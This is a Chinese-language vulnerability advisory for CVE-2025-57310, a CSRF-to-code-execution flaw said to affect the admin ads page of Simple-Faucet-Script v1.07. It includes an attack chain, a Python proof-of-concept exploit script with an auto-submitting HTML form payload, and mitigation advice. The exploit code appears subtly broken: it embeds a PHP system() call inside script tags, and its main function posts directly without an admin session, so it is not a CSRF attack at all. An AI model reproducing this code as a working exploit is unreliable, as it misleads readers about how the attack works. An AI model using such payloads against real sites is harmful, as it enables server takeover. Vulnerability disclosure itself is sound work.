CVE-2025-57310 Salmen2/Simple-Faucet-Script CSRF漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-57310

漏洞类型

CSRF（跨站请求伪造）/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Salmen2/Simple-Faucet-Script v1.07

漏洞概述

CVE-2025-57310是Salmen2/Simple-Faucet-Script v1.07版本中的一个高危安全漏洞。该漏洞属于跨站请求伪造（CSRF）类型，存在于管理后台的广告管理功能中。攻击者可以通过精心构造的POST请求到admin.php?p=ads&c=1端点，在管理员不知情的情况下诱导其执行非预期的操作。由于该管理功能缺乏有效的CSRF令牌验证机制，攻击者可以利用此漏洞在服务器上执行任意代码，从而完全控制受影响的系统。此漏洞的CVSS评分为8.8，属于高危级别，攻击复杂度低，无需认证即可发起攻击，但需要用户交互（管理员点击恶意链接）。机密性、完整性和可用性均受到高影响。

技术细节

该漏洞源于Salmen2/Simple-Faucet-Script v1.07的管理后台admin.php文件中的广告管理功能（ads）缺少CSRF保护机制。攻击者可以构造一个恶意HTML页面，包含自动提交的表单，目标指向admin.php?p=ads&c=1。当管理员访问该恶意页面时，浏览器会自动向目标站点发送POST请求。由于浏览器会自动携带目标域的Cookie，服务器会认为这是管理员的合法操作。攻击者可以在表单中注入恶意代码或命令，利用广告管理功能的权限在服务器端执行任意代码。攻击成功的关键在于：1）管理员已登录后台；2）管理员访问了攻击者构造的恶意链接；3）后台功能存在可被利用的命令执行点。建议在所有敏感操作中添加CSRF token验证，并实施同源策略检查。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单的HTML页面，表单目标指向受害站点的admin.php?p=ads&c=1

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录的管理员访问恶意页面

STEP 3

步骤3

管理员浏览器自动发送POST请求到管理后台，携带有效的会话Cookie

STEP 4

步骤4

服务器处理请求，由于缺少CSRF验证，执行攻击者注入的恶意代码

STEP 5

步骤5

攻击者通过RCE在服务器上执行任意命令，实现完全入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-57310 CSRF Exploit for Simple-Faucet-Script v1.07
# Target: admin.php?p=ads&c=1
# This PoC demonstrates how an attacker can induce admin to execute arbitrary commands

def create_csrf_payload(target_url, malicious_command):
    """
    Generate HTML page with auto-submitting form for CSRF attack
    """
    html_template = '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Loading...</title>
    </head>
    <body>
        <form id="csrf_form" action="{target}" method="POST">
            <input type="hidden" name="action" value="save_ad">
            <input type="hidden" name="ad_code" value="<script>system('{cmd}');</script>">
        </form>
        <script>
            document.getElementById('csrf_form').submit();
        </script>
    </body>
    </html>
    '''.format(target=target_url, cmd=malicious_command)
    return html_template

def exploit_csrf(target_url, command):
    """
    Send CSRF payload to target
    """
    data = {
        'action': 'save_ad',
        'ad_code': f'<script>system("{command}");</script>'
    }
    try:
        response = requests.post(target_url, data=data, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Status code: {response.status_code}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_57310.py <target_url> <command>")
        print("Example: python cve_2025_57310.py http://target.com/admin.php?p=ads&c=1 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    
    print("[*] CVE-2025-57310 CSRF Exploit")
    print(f"[*] Target: {target}")
    print(f"[*] Command: {cmd}")
    
    exploit_csrf(target, cmd)

影响范围

Salmen2/Simple-Faucet-Script v1.07

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙（WAF）中配置规则，检测和阻止针对admin.php?p=ads端点的异常POST请求。同时限制管理后台的访问来源IP，使用强会话管理策略，定期清理会话。长期解决方案是等待官方发布修复补丁后立即升级。